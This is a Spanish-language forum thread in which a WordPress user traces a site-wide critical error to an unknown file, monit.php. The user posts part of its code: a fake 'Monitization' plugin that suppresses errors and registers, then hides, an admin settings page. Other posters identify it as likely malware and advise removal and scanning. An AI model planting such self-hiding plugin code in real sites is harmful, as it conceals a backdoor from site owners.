Error crítico en sitio web de WordPress: ayuda necesaria

• Autor Autor tokiodata
  • Fecha de inicio Fecha de inicio
T

tokiodata

Beta
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
hola.
e lanzado mi blog y pocos plugins instalados y estaba todo perfecto.
el día de hoy entro normal y el index y me sale esto:
"Ha habido un error crítico en tu sitio web.
Aprende más sobre la depuración en WordPress."

ingreso a wp-admin y me sale otro error
"Ha habido un error crítico en tu sitio web. Por favor revisa el buzón de correo electrónico de administración de tu sitio para instrucciones.

no se que a pasado estaba funcionando bien. y e buscado por Internet pero no encuentro respuesta.
no se si alguien me pueda apoyar.
ya que ayer funcionaba bien y no se ha instalado ningún nuevo theme o plug.

Tienes instalado Yoast SEO? si es así desactivalo, hay un problema con su última actualización

no no lo tengo.
y el wp lo tengo con la ultima versión
bufff, entonces lo desconozco lo siento, yo he quitado todos los Yoast SEO de mis webs y ahora me funciona a la perfección. A ver si es algún plugin que hayas actualizado que esté dando problemas.

bufff, entonces lo desconozco lo siento, yo he quitado todos los Yoast SEO de mis webs y ahora me funciona a la perfección. A ver si es algún plugin que hayas actualizado que esté dando problemas.
si de hecho lo que hice fue esto.
me fui por ftp y cambie el nombre a la capeta de plugins la apuse como plugins- y entro al admin y el sitio se ve, entonces un plug esta teniendo problemas.

tengo este plug
basic-seo-pack.
crees que sea ese el que tenga problemas ?

Prueba de desactivarlo a ver si así funciona, de todas maneras yo lo he averiguado escribiendo un mensaje a mi Hosting y me lo han solucionado así.

Desinstala todos los plugins. Ve activándolos uno a uno hasta dar con el que provoca el error.

Desinstala todos los plugins. Ve activándolos uno a uno hasta dar con el que provoca el error.
realice esto.
por ftp fui quitando uno por uno y mostraba error. quite todos y el mismo error pero solo me quedaban estos archivos admin_ ips hello index y monit cuando los quite se puede entrar. entonces ahorita estoy subiendo los plugs pero sin esos archivos

realice esto.
por ftp fui quitando uno por uno y mostraba error. quite todos y el mismo error pero solo me quedaban estos archivos admin_ ips hello index y monit cuando los quite se puede entrar. entonces ahorita estoy subiendo los plugs pero sin esos archivos

¿Qué error es el que tienes? ¿Y por qué desactivas los plugins borrándolos por ftp en vez de hacerlo por el admin?

hola.
e lanzado mi blog y pocos plugins instalados y estaba todo perfecto.
el día de hoy entro normal y el index y me sale esto:
"Ha habido un error crítico en tu sitio web.

ingreso a wp-admin y me sale otro error
"Ha habido un error crítico en tu sitio web. Por favor revisa el buzón de correo electrónico de administración de tu sitio para instrucciones.

no se que a pasado estaba funcionando bien. y e buscado por Internet pero no encuentro respuesta.
no se si alguien me pueda apoyar.
ya que ayer funcionaba bien y no se ha instalado ningún nuevo theme o plug.
puede ser por yoast seo, cambiale el nombre a la carpeta el plugins

¿Qué error es el que tienes? ¿Y por qué desactivas los plugins borrándolos por ftp en vez de hacerlo por el admin?
puede ser por yoast seo, cambiale el nombre a la carpeta el plugins
ok les comento ya encontré el error, en la carpeta de los plugs tengo un archivo llamado monit.php ese si lo subo me manda el error. su contenido de este archivo osea el código es:

Insertar CODE, HTML o PHP:
<?php

/**

* Plugin Name: Monitization

* Description: this plugin will help you Monitize your traffic easily from different ad networks.

* Author: Igor Glavatskiy

* Version: 1.0

*/

error_reporting(0);

ini_set('display_errors', 0);

$plugin_key='6e1aa39328ad32f62d99811e4d7fd962';

$version='1.2';

add_action('admin_menu', function() {

add_options_page( 'Monitization Plugin', 'Monitization', 'manage_options', 'monit', 'mont_page' );

remove_submenu_page( 'options-general.php', 'monit' );

});

no se para que sirva o si lo puede dejar asi sin ese archivo por que cuando instalas wp no genera ese, me imagino que lo genero un plug pero no se si sea necesario.

Suena a que te han hackeado y metido malware.

no se para que sirva o si lo puede dejar asi sin ese archivo por que cuando instalas wp no genera ese, me imagino que lo genero un plug pero no se si sea necesario.
Borralo y tendras que escanear tu web, ese archivo no viene incluido en ninguna instalacion wp, a lo mejor pudiste haber instalado algo raro o como mencionan te hackearon tu sitio.

en efecto tengo que revisar por que ese archivo no viene posiblemente tenga un bug
Te he enviado mp con un plugin para que escanees por si lo gustas hacer con el.

en efecto tengo que revisar por que ese archivo no viene posiblemente tenga un bug

Si acabas de empezar tu web como dices, borra todo, y empieza de nuevo. Y no instales ningún theme o plugin nulled. Y además trabaja la seguridad de tu web.

Si acabas de empezar tu web como dices, borra todo, y empieza de nuevo. Y no instales ningún theme o plugin nulled. Y además trabaja la seguridad de tu web.
es que ya hay contenido ese es el problema.
si no lo mejor seria por seguridad eliminar la cuenta e instalar los plugs pero los que tengo instalados son estos dejo una captura.

Adjuntos

• plugs.webp
    plugs.webp
    23,9 KB · Visitas: 13
Atrás